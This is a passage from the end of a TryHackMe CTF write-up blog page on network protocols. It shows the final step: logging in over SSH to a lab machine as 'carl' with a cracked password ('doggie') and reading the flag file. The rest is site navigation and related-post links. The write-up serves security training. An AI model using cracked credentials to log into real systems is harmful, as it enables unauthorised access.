</code></pre><p>Use <code>ssh</code> to login to the machine with cracked password and obtain the flag.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="ssh%20carl@%3Cip%3E" type="button"></button></div></div><pre><code>ssh carl@&lt;ip&gt;
</code></pre><p>An output similar to below will be obtained.</p><div class="code-header"><div class="copy-code-container"> <button class="copy-code-button" aria-label="Copy code block to your clipboard" data-code="carl@%3Cip%3E's%20password:%20doggie%0Acarl@polomysql:~$%20cat%20MySQL.txt%0A%20%20%20%20%3Cflag%3E" type="button"></button></div></div><pre><code>carl@&lt;ip&gt;'s password: doggie
carl@polomysql:~$ cat MySQL.txt
    &lt;flag&gt;
</code></pre></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/ctf/'>CTF</a>, <a href='/categories/tryhackme/'>TryHackMe</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/tryhackme/" class="post-tag no-text-decoration" >tryhackme</a> <a href="/tags/writeup/" class="post-tag no-text-decoration" >writeup</a> <a href="/tags/ctf/" class="post-tag no-text-decoration" >ctf</a> <a href="/tags/network/" class="post-tag no-text-decoration" >network</a> <a href="/tags/protocols/" class="post-tag no-text-decoration" >protocols</a></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/tryhackme-network-services/"><div class="card-body"> <span class="timeago small" > Dec 11, 2020 <i class="unloaded">2020-12-11T00:00:00+05:30</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Writeup for TryHackMe room - Network Services</h3><div class="text-muted small"><p> Network Services This room contains info and methods to recon and enumerate SMB, Telnet and FTP For complete tryhackme path, refer the link SMB Task 2 - Understanding SMB References S...</p></div></div></a></div><div class="card"> <a href="/posts/tryhackme-advent-of-cyber/"><div class="card-body"> <span class="timeago small" > May 1 <i class="unloaded">2021-05-01T00:00:00+05:30</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Writeup for TryHackMe room - Advent of Cyber</h3><div class="text-muted small"><p> Advent of Cyber This room contains info and methods to recon and enumerate network captures, protocols, web servers, databases, binaries and SUID, privilege escalations, osint, cloud and enc...</p></div></div></a></div><div class="card"> <a href="/posts/tryhackme-advent-of-cyber-2/"><div class="card-body"> <span class="timeago small" > May 4 <i class="unloaded">2021-05-04T00:00:00+05:30</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Writeup for TryHackMe room - Advent of Cyber 2</h3><div class="text-muted small"><p> Advent of Cyber 2 This room contains info and methods to recon and enumerate network captures, protocols, web servers, databases, binaries and SUID, privilege escalations, osint, cloud and e...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/tryhackme-network-services/" class="btn btn-outline-primary"><p>Writeup for TryHackMe room - Network Services</p></a> <a href="/posts/tryhackme-cc-pentesting/" class="btn btn-outline-primary"><p>Writeup for TryHackMe room - CC Pentesting</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2021 <a href="https://github.com/4n3i5v74">4n3i5v74</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/tryhackme/">tryhackme</a> <a class="post-tag" href="/tags/writeup/">writeup</a> <a class="post-tag" href="/tags/privesc/">privesc</a> <a class="post-tag" href="/tags/pentest/">pentest</a> <a class="post-tag" href="/tags/cheatsheet/">cheatsheet</a> <a class="post-tag" href="/tags/network/">network</a> <a class="post-tag" href="/tags/protocols/">protocols</a> <a class="post-tag" href="/tags/web/">web</a> <a class="post-tag" href="/tags/windows/">windows</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://4n3i5v74.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
